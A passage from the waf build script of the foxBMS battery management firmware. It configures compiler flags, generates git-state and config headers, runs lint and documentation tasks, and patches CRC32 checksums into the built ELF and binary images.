r'\\.\\.[ ]\\|version\\|[ ]replace::[ ]``(\\d{1,}\\.\\d{1,}\\.\\d{1,})``'\n tmp_version = re.search(rgx, txt)\n try:\n conf.env.version = tmp_version.group(1)\n except AttributeError:\n err_msg = 'Could not find a version info in {}.\\\n'.format(version_info_file)\n conf.fatal(err_msg)\n\n conf.env.appname = 'foxbms'\n conf.env.appname_prefix = conf.env.appname\n conf.env.vendor = 'Fraunhofer IISB'\n conf.env.version_primary = conf.env.version\n conf.env.version_secondary = conf.env.version\n\n # Setup the compiler and link flags\n with open('compiler-flags.yml', 'r') as stream:\n try:\n compiler_flags = yaml.load(stream, Loader=YAMLLoader)\n except yaml.YAMLError as exc:\n conf.fatal(exc)\n cflags = compiler_flags['CFLAGS']\n conf.env.append_value('CFLAGS', [x for x in cflags if type(x) == str])\n for x in cflags:\n if type(x) is dict:\n add_flag = 'CFLAGS_' + list(x.keys())[0]\n conf.env.append_value(add_flag, list())\n if list(x.values())[0] is None:\n continue\n conf.env.append_value(add_flag, *(x.values()))\n conf.env.ASMFLAGS = compiler_flags['ASMFLAGS']\n conf.env.LINKFLAGS = compiler_flags['LINKFLAGS']\n conf.env.XLINKER = compiler_flags['XLINKER']\n\n # get HAL version and floating point version based on compiler define and\n # check if cpu and floating point version are fitting together\n cpu = None\n floating_point_version = None\n for _cflag in conf.env.CFLAGS:\n if 'mcpu' in _cflag:\n cdef, cpu = _cflag.split('=')\n if 'mfpu' in _cflag:\n cdef, floating_point_version = _cflag.split('=')\n if not cpu:\n conf.fatal('cflag \\'mcpu\\' missing.')\n if not floating_point_version:\n conf.fatal('cflag \\'mfpu\\' missing.')\n if cpu == 'cortex-m4':\n conf.env.CPU_MAJOR = 'STM32F4xx'\n if floating_point_version != 'fpv4-sp-d16':\n conf.fatal('floating point unit flag not compatible with cpu')\n else:\n conf.fatal(f'cpu \\'{cpu}\\' is not supported')\n\n utcnow = datetime.datetime.utcnow()\n utcnow = ''.join(utcnow.isoformat('-').split('.')\n [0].replace(':', '-').split('-'))\n conf.env.timestamp = utcnow\n\n conf.define('BUILD_APPNAME_PREFIX', conf.env.appname_prefix)\n for x in variants:\n conf.define(\n ('BUILD_APPNAME_{}'.format(x)).upper(),\n '{}_{}'.format(conf.env.appname_prefix, x)[:14],\n comment='Define is trimmed to max. 14 characters'.format(x))\n conf.define('BUILD_VERSION_PRIMARY', conf.env.version_primary)\n conf.define('BUILD_VERSION_SECONDARY', conf.env.version_secondary)\n\n conf.env.target = conf.options.target\n\n env_debug = conf.env.derive()\n env_debug.detach()\n env_release = conf.env.derive()\n env_release.detach()\n\n # configuration for debug\n conf.setenv('debug', env_debug)\n conf.define('RELEASE', 1)\n conf.undefine('DEBUG')\n conf.env.CFLAGS += ['-g', '-O0']\n\n # configuration for release\n conf.setenv('release', env_release)\n conf.env.CFLAGS += ['-O2']\n\n if conf.options.target == 'release':\n conf.setenv('', env_release)\n else:\n conf.setenv('', env_debug)\n\n env_release.store(os.path.join(out, 'env-store.log'))\n\n config_dir = 'config'\n conf.path.get_bld().make_node(config_dir).mkdir()\n conf.confdir = conf.path.get_bld().find_node(config_dir)\n\n _cmd = [Utils.subst_vars('${CC}', conf.env), '-dM', '-E', '-']\n std_out, std_err = conf.cmd_and_log(_cmd, output=0, input='\\n'.encode())\n std_out = '/* WARNING: DO NOT EDIT */\\n' \\\n '/* INTERNAL GCC MARCOS */\\n' \\\n '/* FOR INFORMATION ONLY */\\n' \\\n '\\n' \\\n '{}'.format(std_out)\n conf.confdir.make_node('gcc_builtin_macros.h').write(std_out)\n\n header_file_name = conf.env.appname_prefix + 'config.h'\n header_file_path = os.path.join(config_dir, header_file_name),\n def_guard = header_file_name.upper().replace('.H', '_H_')\n conf.write_config_header(header_file_path, guard=def_guard)\n print('---')\n print('Vendor: {}'.format(conf.env.vendor))\n print('Appname prefix: {}'.format(conf.env.appname_prefix))\n print('Applications: {}'.format(', '.join(variants)))\n print('Version primary: {}'.format(conf.env.version_primary))\n print('Version secondary: {}'.format(conf.env.version_secondary))\n print('---')\n print('Config header: {}'.format(conf.env.cfg_files))\n print('Build configuration: {}'.format(conf.env.target))\n print('---')\n conf.path.get_bld().make_node('cflags.log').write('\\n'.join(conf.env.CFLAGS) + '\\n')\n conf.path.get_bld().make_node('cflags-foxbms.log').write('\\n'.join(conf.env.CFLAGS_foxbms) + '\\n')\n conf.path.get_bld().make_node('cflags-freertos.log').write('\\n'.join(conf.env.CFLAGS_freertos) + '\\n')\n conf.path.get_bld().make_node('hal.log').write('\\n'.join(conf.env.CFLAGS_hal) + '\\n')\n conf.path.get_bld().make_node('asmflags.log').write('\\n'.join(conf.env.ASMFLAGS) + '\\n')\n conf.path.get_bld().make_node('linkflags.log').write('\\n'.join(conf.env.LINKFLAGS) + '\\n')\n conf.path.get_bld().make_node('xlinker.log').write('\\n'.join(conf.env.XLINKER) + '\\n')\n\n lib_dir = conf.path.get_bld().make_node('lib')\n lib_dir.mkdir()\n conf.env.append_value('LIBPATH', lib_dir.abspath())\n conf.env.LIB_DIR_LIBS = lib_dir.abspath()\n print(f'Additional Library directory: {lib_dir.abspath()}')\n\n inc_dir = conf.path.get_bld().make_node('include')\n inc_dir.mkdir()\n conf.env.append_value('INCLUDES', inc_dir.abspath())\n conf.env.INCLUDE_DIR_LIBS = inc_dir.abspath()\n print(f'Additional Include directory: {inc_dir.abspath()}')\n\n if conf.options.libs:\n conf.env.USER_DEFINED_LIBS = conf.options.libs\n print(f'Using library: {conf.options.libs}')\n else:\n conf.env.USER_DEFINED_LIBS = None\n\n # calculate expected binary size from flasheader credentials\n conf.env.flash_begin_adr = 0x080FFF48 & 0x00ffffff\n conf.env.flash_header_adr = 0x080FFF00 & 0x00ffffff\n conf.env.flash_end_adr = 0x080FFF4C & 0x00ffffff\n\n # cppcheck configuration\n if conf.env.CPPCHECK:\n cppcheck_dir = conf.path.get_bld().make_node('cppcheck')\n cppcheck_dir.mkdir()\n templateLoader = jinja2.FileSystemLoader(searchpath=os.path.join('tools', 'cppcheck'))\n templateEnv = jinja2.Environment(loader=templateLoader, newline_sequence=conf.env.jinja2_newline)\n template = templateEnv.get_template('cppcheck.template')\n outputText = template.render(\n bld_dir='.',\n src_dir='../../embedded-software',\n inc_dirs=['../../embedded-software/libs',\n '../../embedded-software/mcu-common',\n '../../embedded-software/mcu-primary',\n '../../embedded-software/mcu-secondary',\n '../../build/primary/embedded-software/mcu-primary/src/general',\n '../../build/secondary/embedded-software/mcu-secondary/src/general'],\n addons=['threadsafety', 'y2038', 'cert', 'misra'])\n\n cppcheck_cfg = cppcheck_dir.make_node('cppcheck.cppcheck')\n cppcheck_cfg.write(outputText)\n conf.env.cppcheck_dir = cppcheck_dir.abspath()\n conf.env.cppcheck_cfg = cppcheck_cfg.abspath()\n print(f'---\\ncppcheck configuration: {conf.env.cppcheck_cfg}')\n\n print('---\\ngit information:')\n try:\n (std_out, std_err) = conf.cmd_and_log([conf.env.GIT[0], 'config', '--get', 'remote.origin.url'], output=waflib.Context.BOTH)\n except Errors.WafError as e:\n Logs.warn('--> directory is not a git repository')\n t = ('NOREMOTE', [True])\n else:\n t = (std_out.strip(), [False])\n\n conf.env.append_value('GIT_REPO_PATH', t[0])\n conf.env.append_value('GIT_DIRTY_ALWAYS', t[1])\n print(f'repository path: {conf.env.GIT_REPO_PATH[0]}')\n if conf.env.GIT_DIRTY_ALWAYS[0]:\n print(f'no remote: {conf.env.GIT_DIRTY_ALWAYS[0]}')\n conf.env.FILE_TEMPLATE_C = conf.path.find_node('tools/styleguide/file-templates/template.c.jinja2').read()\n conf.env.FILE_TEMPLATE_H = conf.path.find_node('tools/styleguide/file-templates/template.h.jinja2').read()\n\n\ndef build(bld):\n\n import sys\n import logging\n from waflib import Logs\n if not bld.variant:\n bld.fatal(f'A {bld.cmd} variant must be specified, run \\'{sys.executable} {sys.argv[0]} --help\\'')\n\n log_file = os.path.join(out, 'build_' + bld.variant + '.log')\n bld.logger = Logs.make_logger(log_file, out)\n hdlr = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter('%(message)s')\n hdlr.setFormatter(formatter)\n bld.logger.addHandler(hdlr)\n\n if bld.variant in ('primary', 'secondary'):\n bld.add_pre_fun(repostate)\n\n bld.env.es_dir = os.path.normpath('embedded-software')\n if bld.variant == 'libs':\n src_dir = os.path.normpath('{}'.format(bld.variant))\n if bld.cmd.startswith('clean'):\n for x in bld.path.ant_glob(f'{out}/lib/**/*.a {out}/include/**/*.h'):\n x.delete()\n else:\n # for bare build we *basically* have the same build, therefore the\n # source folder stays the same, but *_bare builds do not include\n # FreeRTOS\n if bld.variant.endswith('_bare'):\n src_dir = os.path.normpath(\n 'mcu-{}'.format(bld.variant.replace('_bare', '')))\n bld.env.FreeRTOS_dirs = '' # no FreeRTOS in bare build\n else:\n src_dir = os.path.normpath('mcu-{}'.format(bld.variant))\n bld.env.FreeRTOS_dirs = ' '.join([\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-freertos', 'Source'),\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-freertos', 'Source', 'include'),\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-freertos', 'Source', 'portable', 'GCC', 'ARM_CM4F')])\n\n bld.env.mcu_dir = src_dir\n\n bld.env.common_dir = os.path.normpath('mcu-common')\n bld.env.hal_dirs = ' '.join([\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-hal', 'CMSIS', 'Device', 'ST', bld.env.CPU_MAJOR, 'Include'),\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-hal', 'CMSIS', 'Include'),\n os.path.join(bld.top_dir, bld.env.es_dir, 'mcu-hal', bld.env.CPU_MAJOR + '_HAL_Driver', 'Inc')])\n t = os.path.dirname(bld.env.cfg_files[0])\n bld.env.append_value('INCLUDES', t)\n bld.recurse(os.path.join(bld.env.es_dir, src_dir))\n\n\ndef repostate(bld):\n Logs.info('Adding git information...')\n file_name = 'gitinfo_cfg'\n gitinfo_dir = os.path.join(bld.env.es_dir, bld.env.mcu_dir, 'src', 'general')\n bld.path.get_bld().make_node(gitinfo_dir).mkdir()\n bld.env.git_infoc = bld.path.get_bld().make_node(os.path.join(gitinfo_dir, f'{file_name}.c'))\n bld.env.git_infoh = bld.path.get_bld().make_node(os.path.join(gitinfo_dir, f'{file_name}.h'))\n templatec = jinja2.Environment(loader=jinja2.BaseLoader, keep_trailing_newline=True, newline_sequence=bld.env.jinja2_newline).from_string(bld.env.FILE_TEMPLATE_C)\n templateh = jinja2.Environment(loader=jinja2.BaseLoader, keep_trailing_newline=True, newline_sequence=bld.env.jinja2_newline).from_string(bld.env.FILE_TEMPLATE_H)\n _date = datetime.datetime.today().strftime('%d.%m.%Y')\n\n if bld.env.GIT_REPO_PATH[0] == \"NOREMOTE\":\n bld.env.GIT_COMMIT_ID = 'NOVALIDCOMMIT'\n bld.env.CLEAN, bld.env.DIRTY = (0, 1)\n bld.env.GIT_STATUS = 'GIT_DIRTY_STARTUP'\n else:\n try:\n (std_out, std_err) = bld.cmd_and_log([bld.env.GIT[0], 'rev-parse', 'HEAD'], output=waflib.Context.BOTH)\n except Errors.WafError as e:\n Logs.error(e)\n bld.env.GIT_COMMIT_ID = 'NOVALIDCOMMIT'\n else:\n bld.env.GIT_COMMIT_ID = std_out.strip()\n\n try:\n (std_out, std_err) = bld.cmd_and_log([bld.env.GIT[0], 'status'], output=waflib.Context.BOTH)\n except Errors.WafError as e:\n std_out = None\n Logs.error(e)\n else:\n if \"nothing to commit, working tree clean\" in std_out:\n bld.env.CLEAN, bld.env.DIRTY = (1, 0)\n bld.env.GIT_STATUS = 'GIT_CLEAN_STARTUP'\n else:\n bld.env.CLEAN, bld.env.DIRTY = (0, 1)\n bld.env.GIT_STATUS = 'GIT_DIRTY_STARTUP'\n print(f'clean: {bld.env.CLEAN} \\ndirty: {bld.env.DIRTY}')\n\n # header file\n brief = 'Contains information about the repository state'\n macros = []\n defs = ['''\\\ntypedef enum {\n GIT_CLEAN_STARTUP = 0,\n GIT_DIRTY_STARTUP = 1,\n} GIT_STARTUP_BIT_e;''',\n f'''\\\ntypedef struct {{\n STD_RETURN_TYPE_e clean_repo_build;\n STD_RETURN_TYPE_e allow_startup;\n}} GIT_STATUS_s;''',\n f'''\\\ntypedef struct {{\n char repo_url[{len(bld.env.GIT_REPO_PATH[0])+1}];\n char commit_id[{len(bld.env.GIT_COMMIT_ID)+1}];\n uint8_t always_dirty; /* if there is no remote, this is always set */\n GIT_STARTUP_BIT_e git_startup_bit; /* set dependent on git status */\n}} GIT_ValidStruct_s;''']\n\n externvars = [\n 'extern GIT_STATUS_s git_status;',\n 'extern const GIT_ValidStruct_s git_validation;']\n externfunsproto = ['extern STD_RETURN_TYPE_e GIT_checkStartup(void);']\n txt_git_info_h = templateh.render(\n filename=os.path.splitext(file_name)[0],\n add_author_info='(autogenerated)',\n filecreation=_date,\n ingroup='GIT_INFO',\n prefix='GIT',\n brief=brief,\n details='',\n includes=['general.h'],\n macros=macros,\n defs=defs,\n externvars=externvars,\n externfunsproto=externfunsproto)\n Logs.info(f'Created {bld.env.git_infoh.relpath()}')\n bld.env.git_infoh.write(txt_git_info_h)\n\n # implementation file\n startupfun = ['''\\\nSTD_RETURN_TYPE_e GIT_checkStartup() {\n STD_RETURN_TYPE_e retval = E_NOT_OK;\n if (git_validation.git_startup_bit == GIT_CLEAN_STARTUP &&\n git_validation.always_dirty == 0) {\n retval = E_OK;\n }\n return retval;\n}''']\n externvars = [\n '''GIT_STATUS_s git_status = {0xFF, 0xFF};''',\n f'''\\\nextern const GIT_ValidStruct_s git_validation = {{\n \"{bld.env.GIT_REPO_PATH[0]}\", /* remote repository path */\n \"{bld.env.GIT_COMMIT_ID}\", /* last commit hash that could be retrivied */\n {int(bld.env.GIT_DIRTY_ALWAYS[0])}, /* repository has a valid remote */\n {bld.env.GIT_STATUS}, /* is the repository dirty? */\n}};\n''']\n txt_git_info_c = templatec.render(\n filename=os.path.splitext(file_name)[0],\n add_author_info='(autogenerated)',\n inc_files=[],\n filecreation=_date,\n ingroup='GIT_INFO',\n prefix='GIT',\n brief='Contains information about the repository state',\n externvars=externvars,\n externfunsimpl=startupfun,\n details='')\n bld.env.git_infoc.write(txt_git_info_c)\n Logs.info(f'Created {bld.env.git_infoc.relpath()}')\n Logs.info('done...')\n\n\ndef doxygen(bld):\n import sys\n import logging\n from waflib import Logs\n\n if not bld.variant:\n bld.fatal(f'A {bld.cmd} variant must be specified, run \\'{sys.executable} {sys.argv[0]} --help\\'')\n\n if not bld.env.DOXYGEN:\n bld.fatal(f'Doxygen was not configured. Run \\'{sys.executable} {sys.argv[0]} --help\\'')\n\n _docbuilddir = os.path.normpath(bld.bldnode.abspath())\n doxygen_conf_dir = os.path.join('documentation', 'doxygen')\n os.makedirs(_docbuilddir, exist_ok=True)\n conf_file = 'doxygen-{}.conf'.format(bld.variant)\n doxygenconf = os.path.join(doxygen_conf_dir, conf_file)\n\n log_file = os.path.join(\n bld.bldnode.abspath(), 'doxygen_' + bld.variant + '.log')\n bld.logger = Logs.make_logger(log_file, out)\n hdlr = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter('%(message)s')\n hdlr.setFormatter(formatter)\n bld.logger.addHandler(hdlr)\n\n bld(features='doxygen', doxyfile=doxygenconf)\n\n\ndef flake8(bld):\n bld(features='flake8')\n\n\ndef cppcheck(bld):\n\n class tsk_cppcheck(Task.Task):\n\n def scan(self):\n nodes = bld.path.ant_glob('**/*.c **/*.h')\n return (nodes, [])\n\n def run(self):\n prg = Utils.subst_vars('${CPPCHECK}', bld.env)\n cfg = Utils.subst_vars('${cppcheck_cfg}', bld.env)\n cmd = [prg, f'--project={cfg}']\n if bld.env.CPPCHECK_ERROR_EXITCODE:\n opt = [f'--error-exitcode={bld.env.CPPCHECK_ERROR_EXITCODE}']\n cmd.extend(opt)\n std_out, std_err = self.generator.bld.cmd_and_log(cmd, output=waflib.Context.BOTH)\n if std_err:\n Logs.error(std_err)\n if not std_err or bld.env.CPPCHECK_ERROR_EXITCODE == 0:\n self.outputs[0].write(std_out)\n\n @TaskGen.feature('run_cppcheck')\n def add_cppcheck(self):\n self.create_task('tsk_cppcheck', tgt=self.path.find_or_declare('cppcheck').make_node('cppcheck.out'))\n\n bld(features='run_cppcheck')\n\n\ndef cpplint(bld):\n from waflib import Logs\n\n class tsk_cpplint(Task.Task):\n\n def keyword(self):\n return 'Linting'\n\n def scan(self):\n node = self.inputs[0]\n return ([node], [])\n\n def run(self):\n cmd = [Utils.subst_vars('${CPPLINT}', bld.env)] + self.generator.env.cpplint_options + [self.inputs[0].abspath()]\n Logs.debug(' '.join(cmd))\n proc = Utils.subprocess.Popen(cmd, stdout=Utils.subprocess.PIPE, stderr=Utils.subprocess.PIPE, shell=True)\n std_out, std_err = proc.communicate()\n std_out, std_err = std_out.decode(), std_err.decode()\n if proc.returncode:\n Logs.error(std_err)\n self.outputs[0].change_ext('.error').write(std_err)\n else:\n self.outputs[0].change_ext('.error').delete()\n self.outputs[0].write(std_out)\n\n def set_out_dir(bld, src_node, out_dir='cpplint', ext='.cpplint'):\n my_bld_node = bld.bldnode.make_node(out_dir)\n rp = src_node.get_bld().relpath()\n bld_target = my_bld_node.make_node(rp + ext)\n\n return bld_target\n\n @TaskGen.feature('run_cpplint')\n def add_cpplint(self):\n srcs = bld.path.ant_glob(self.env.cpplint_src, excl=self.env.cpplint_excl)\n for src_file in srcs:\n tgt = set_out_dir(bld, src_file)\n self.create_task('tsk_cpplint', src=src_file, tgt=tgt)\n\n with open(bld.env.CPPLINT_CONF, 'r') as stream:\n try:\n cpplint_conf = yaml.load(stream, Loader=YAMLLoader)\n except yaml.YAMLError as exc:\n bld.fatal(exc)\n src = cpplint_conf['files']['include']\n filters = cpplint_conf['filter']\n excl_tmp = cpplint_conf['files']['exclude']\n excl = []\n for x in excl_tmp:\n if not x.startswith('**/'):\n excl.append('**/' + x)\n else:\n excl.append(x)\n\n bld.env.cpplint_options = ['--output={}'.format(cpplint_conf['output'])]\n bld.env.cpplint_options += ['--linelength={}'.format(cpplint_conf['linelength'])]\n bld.env.cpplint_options += ['--filter=' + ','.join(filters)]\n bld.env.cpplint_src = src\n bld.env.cpplint_excl = excl\n bld(features='run_cpplint')\n\n\ndef sphinx(bld):\n import sys\n import logging\n from waflib import Logs\n if not bld.env.SPHINX_BUILD:\n bld.fatal('ERROR: cannot build documentation (\\'sphinx-build\\' is not'\n 'found in PATH)')\n log_file = os.path.join(bld.bldnode.abspath(), 'sphinx.log')\n bld.logger = Logs.make_logger(log_file, out)\n hdlr = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter('%(message)s')\n hdlr.setFormatter(formatter)\n bld.logger.addHandler(hdlr)\n bld(features='sphinx',\n config=bld.path.find_node(bld.env.sphinx_conf_path),\n outdir='documentation',\n version=bld.env.version,\n )\n\n\ndef clean_all(bld):\n \"\"\"cleans all parts of the project\"\"\"\n from waflib import Options\n commands_after = Options.commands\n Options.commands = ['clean_primary', 'clean_secondary',\n 'clean_primary_bare', 'clean_secondary_bare',\n 'clean_libs']\n Options.commands += commands_after\n\n\ndef build_all(bld):\n \"\"\"builds all parts of the project (binaries and documentation)\"\"\"\n from waflib import Options\n commands_after = Options.commands\n Options.commands = []\n if bld.options.libs:\n Options.commands = ['build_libs']\n Options.commands += ['build_primary', 'build_secondary',\n 'build_primary_bare', 'build_secondary_bare',\n 'doxygen_primary', 'doxygen_secondary',\n 'doxygen_primary_bare', 'doxygen_secondary_bare',\n 'sphinx']\n Options.commands += commands_after\n\n\ndef dist(conf):\n conf.base_name = 'foxbms'\n conf.algo = 'tar.gz'\n conf.excl = out\n conf.excl += ' .ws **/tools/waf*.*.**-* .lock-*'\n conf.excl += ' **/.git **/.gitignore **/.gitattributes '\n conf.excl += ' **/*.tar.bz2 **/*.tar.gz **/*.pyc '\n\n\ndef distcheck_cmd(self):\n import shlex\n cfg = []\n if Options.options.distcheck_args:\n cfg = shlex.split(Options.options.distcheck_args)\n else:\n cfg = [x for x in sys.argv if x.startswith('-')]\n cmd = [sys.executable, sys.argv[0], 'configure', 'build_primary', 'build_secondary', 'doxygen_primary', 'doxygen_secondary', 'sphinx'] + cfg\n return cmd\n\n\ndef check_cmd(self):\n import tarfile\n with tarfile.open(self.get_arch_name())as t:\n for x in t:\n t.extract(x)\n cmd = self.make_distcheck_cmd()\n ret = Utils.subprocess.Popen(cmd, cwd=self.get_base_name()).wait()\n if ret:\n raise Errors.WafError('distcheck failed with code % r' % ret)\n\n\ndef distcheck(conf):\n \"\"\"creates tar.bz form the source directory and tries to run a build\"\"\"\n from waflib import Scripting\n Scripting.DistCheck.make_distcheck_cmd = distcheck_cmd\n Scripting.DistCheck.check = check_cmd\n conf.base_name = 'foxbms'\n conf.excl = out\n conf.excl += ' .ws **/tools/waf*.*.**-* .lock-*'\n conf.excl += ' **/.git **/.gitignore **/.gitattributes '\n conf.excl += ' **/*.tar.bz2 **/*.tar.gz **/*.pyc '\n\n\nclass tsk_cal_chksum(Task.Task):\n def keyword(self):\n return 'Calculating checksum'\n after = ['tsk_binflashheadergen', 'tsk_binflashgen']\n color = 'RED'\n\n def run(self):\n import binascii\n import struct\n\n with open(self.inputs[1].abspath(), 'rb') as pheader_buffer_file:\n pheader_buffer_file.seek(self.generator.env.flash_begin_adr ^ self.generator.env.flash_header_adr)\n checksum_start_address = struct.unpack('i', pheader_buffer_file.read(4))[0]\n pheader_buffer_file.seek(self.generator.env.flash_end_adr ^ self.generator.env.flash_header_adr)\n checksum_end_address = struct.unpack('i', pheader_buffer_file.read(4))[0]\n chksum_calc_length = checksum_end_address - checksum_start_address + 1\n\n prg_txt = self.inputs[0].read('rb')\n if not chksum_calc_length == len(prg_txt):\n self.generator.fatal('Checksum calculation error')\n\n checksum = binascii.crc32(prg_txt, 0) & 0xFFFFFFFF\n output = f'checksum: 0x{checksum:X}'\n self.outputs[0].write(output + '\\n')\n print(output)\n\n\nclass tsk_wrt_chksum(Task.Task):\n def keyword(self):\n return 'Writing checksum'\n after = ['tsk_cal_chksum']\n color = 'RED'\n\n def run(self):\n import shutil\n import struct\n\n checksum_struct_name = 'ver_sw_validation'\n checksum_position_in_struct = 0x10\n date_position_in_struct = 0xA0\n time_position_in_struct = 0xAC\n\n checksum_data = yaml.load(self.inputs[1].read(), Loader=yaml.Loader)\n checksum = hex(checksum_data['checksum'])\n\n if checksum.endswith('L'):\n checksum = checksum[:-1]\n cmd = Utils.subst_vars('${OBJDUMP} --section=.flashheader -h', self.env)\n cmd += f' {self.inputs[0].abspath()}'\n std_out, std_err = self.generator.bld.cmd_and_log(cmd, output=waflib.Context.BOTH)\n sectionAttributes = dict(zip(std_out.splitlines()[4].split(), std_out.splitlines()[5].split()))\n\n cmd = Utils.subst_vars('${OBJDUMP} --section=.flashheader -t', self.env)\n cmd += f' {self.inputs[0].abspath()}'\n std_out, std_err = self.generator.bld.cmd_and_log(cmd, output=waflib.Context.BOTH)\n std_out = [line for line in std_out.splitlines() if checksum_struct_name in line]\n symbolAttributes = std_out[0].split()\n\n positionInSection = int(symbolAttributes[0], 16) - int(sectionAttributes['LMA'], 16)\n\n shutil.copy(self.inputs[0].abspath(), self.outputs[0].abspath())\n\n # calculate offset of checksum in ELF file\n offset = int(sectionAttributes['File'], 16) + positionInSection + checksum_position_in_struct\n # create single bytes from checksum string\n bytes = struct.pack('I', int(checksum, 16))\n # write checksum bytes to calculated offset in ELF file\n with open(self.outputs[0].abspath(), 'r+b') as fh:\n fh.seek(offset)\n fh.write(bytes)\n\n # calculate offset of date in ELF file\n offset = int(sectionAttributes['File'], 16) + positionInSection + date_position_in_struct\n # create single bytes from date string\n d = datetime.datetime.now()\n bytes = d.strftime('%b %d %Y').encode()\n # write date bytes to calculated offset in ELF file\n with open(self.outputs[0].abspath(), 'r+b') as fh:\n fh.seek(offset)\n fh.write(bytes)\n\n # calculate offset of time in ELF file\n offset = int(sectionAttributes['File'], 16) + positionInSection + time_position_in_struct\n # create single bytes from time string\n bytes = d.strftime('%H:%M:%S').encode()\n # write time bytes to calculated offset in ELF file\n with open(self.outputs[0].abspath(), 'r+b') as fh:\n fh.seek(offset)\n fh.write(bytes)\n\n\n@TaskGen.feature('chksum')\n@TaskGen.before('add_hexgen_task')\n@TaskGen.after('apply_link', 'add_bingen_task')\ndef add_chksum_task(self):\n try:\n link_task = self.link_task\n binflashgen = self.binflashgen_task\n binflashheadergen = self.binflashheadergen_task\n except AttributeError:\n return\n self.cal_chksum_task = self.create_task('tsk_cal_chksum',\n src=[binflashgen.outputs[0],\n binflashheadergen.outputs[0]],\n tgt=self.path.get_bld().make_node('checksum.yml'))\n self.wrt_chksum_task = self.create_task('tsk_wrt_chksum',\n src=[link_task.outputs[0], self.cal_chksum_task.outputs[0]],\n tgt=link_task.outputs[0].change_ext(''))\n\n\nclass strip(Task.Task):\n after = ['tsk_binflashheaderpatch']\n run_str = '${STRIP} ${SRC} -o ${TGT}'\n color = 'BLUE'\n\n\n@TaskGen.feature('strip')\n@TaskGen.after('add_chksum_task')\n@TaskGen.after('add_bingen_task')\ndef add_strip_task(self):\n try:\n link_task = self.link_task\n except AttributeError:\n return\n self.create_task('strip',\n src=link_task.outputs[0],\n tgt=link_task.outputs[0].change_ext('_nd.elf'))\n\n\nclass tsk_hexgen(Task.Task):\n def keyword(self):\n return 'Creating hex file'\n after = ['tsk_wrt_chksum']\n run_str = '${OBJCOPY} -R .ext_sdramsect_bss -R .bkp_ramsect -O ihex ${SRC} ${TGT}'\n color = 'CYAN'\n\n\n@TaskGen.feature('hexgen')\n@TaskGen.after('add_chksum_task')\ndef add_hexgen_task(self):\n try:\n wrt_chksum_task = self.wrt_chksum_task\n except AttributeError:\n return\n self.hexgen = self.create_task('tsk_hexgen',\n src=wrt_chksum_task.outputs[0],\n tgt=wrt_chksum_task.outputs[0].change_ext('.hex'))\n\n\nclass tsk_binflashheaderpatch(Task.Task):\n def keyword(self):\n return 'Patching bin flashheader'\n after = ['tsk_wrt_chksum']\n run_str = '${OBJCOPY} -j .flashheader -O binary ${SRC} ${TGT}'\n color = 'RED'\n\n\nclass tsk_binflashheadergen(Task.Task):\n def keyword(self):\n return 'Creating bin flashheader'\n run_str = '${OBJCOPY} -j .flashheader -O binary ${SRC} ${TGT}'\n color = 'RED'\n\n\nclass tsk_binflashgen(Task.Task):\n def keyword(self):\n return 'Creating bin flash'\n run_str = '${OBJCOPY} -R .ext_sdramsect_bss -R .bkp_ramsect -R .flashheader -O binary ${SRC} ${TGT}'\n color = 'RED'\n\n\n@TaskGen.feature('bingen')\n@TaskGen.before('add_chksum_task')\n@TaskGen.after('apply_link')\ndef add_bingen_task(self):\n try:\n link_task = self.link_task\n except AttributeError:\n return\n self.binflashgen_task = self.create_task('tsk_binflashgen', src=link_task.outputs[0], tgt=link_task.outputs[0].change_ext('_flash.bin', '.elf.unpatched'))\n self.binflashheadergen_task = self.create_task('tsk_binflashheadergen', src=link_task.outputs[0], tgt=link_task.outputs[0].change_ext('_flashheader.bin.unpatched', '.elf.unpatched'))\n\n\n@TaskGen.feature('binpatch')\n@TaskGen.after('add_chksum_task')\n@TaskGen.after('apply_link')\ndef add_patch_bin_task(self):\n try:\n wrt_chksum_task = self.wrt_chksum_task\n except AttributeError:\n return\n self.binflashheaderpatch_task = self.create_task('tsk_binflashheaderpatch', src=wrt_chksum_task.outputs[0], tgt=wrt_chksum_task.outputs[0].change_ext('_flashheader.bin'))\n\n\nimport waflib.Tools.asm # noqa: E402 import before redefining\nfrom waflib.TaskGen import extension # noqa: E402\n\n\nclass Sasm(Task.Task):\n color = 'BLUE'\n run_str = '${CC} ${ASMFLAGS} ${CPPPATH_ST:INCPATHS} -o ${TGT} ${SRC[0].abspath()}'\n\n\n@extension('.s')\ndef asm_hook(self, node):\n name = 'Sasm'\n out = node.change_ext('.o')\n task = self.create_task(name, node, out)\n try:\n self.compiled_tasks.append(task)\n except AttributeError:\n self.compiled_tasks = [task]\n return task\n\n\nclass size(Task.Task):\n def keyword(self):\n return 'Calculating size'\n before = ['tsk_cal_chksum']\n color = 'BLUE'\n\n def run(self):\n cmd = Utils.subst_vars('${SIZE}', self.env) + f' {self.inputs[0].abspath()}'\n x = self.outputs[0].path_from(self.generator.path)\n out, err = self.generator.bld.cmd_and_log(cmd, output=waflib.Context.BOTH, quiet=waflib.Context.STDOUT)\n self.generator.path.make_node(x).write(out)\n if err:\n Logs.error(err)\n\n\n@TaskGen.feature('size')\n@TaskGen.after('apply_link')\ndef process_sizes(self):\n if getattr(self, 'link_task', None) is None:\n return\n\n objects_to_size = []\n objects_to_size.extend(self.link_task.inputs)\n objects_to_size.extend(self.link_task.outputs)\n\n for node in objects_to_size:\n out = node.change_ext('.size.log')\n self.create_task('size', node, out)\n\n\nclass tsk_check_includes(Task.Task):\n before = ['size']\n color = 'PINK'\n\n def run(self):\n import os\n import collections\n err_msg = f'{self.inputs[0].abspath()} introduces the following errors:\\n'\n err_ctn_missing = 0\n err_ctn_duplicates = 0\n incs = self.generator.bld.env.INCLUDES + [x if os.path.isabs(x) else os.path.join(self.generator.path.abspath(), x) for x in self.generator.includes]\n Logs.debug('\\n'.join(incs))\n for x in incs:\n if not os.path.isdir(x):\n err_ctn_missing += 1\n if err_ctn_missing == 1:\n err_msg += 'The following include directories do not exist:\\n'\n err_msg += f'{x}\\n'\n if not (sorted(incs) == sorted(list(set(incs)))):\n err_ctn_duplicates += 1\n if err_ctn_duplicates == 1:\n err_msg += 'There are duplicate includes:\\n'\n duplicates = [item for item, count in collections.Counter(incs).items() if count > 1]\n for p in duplicates:\n 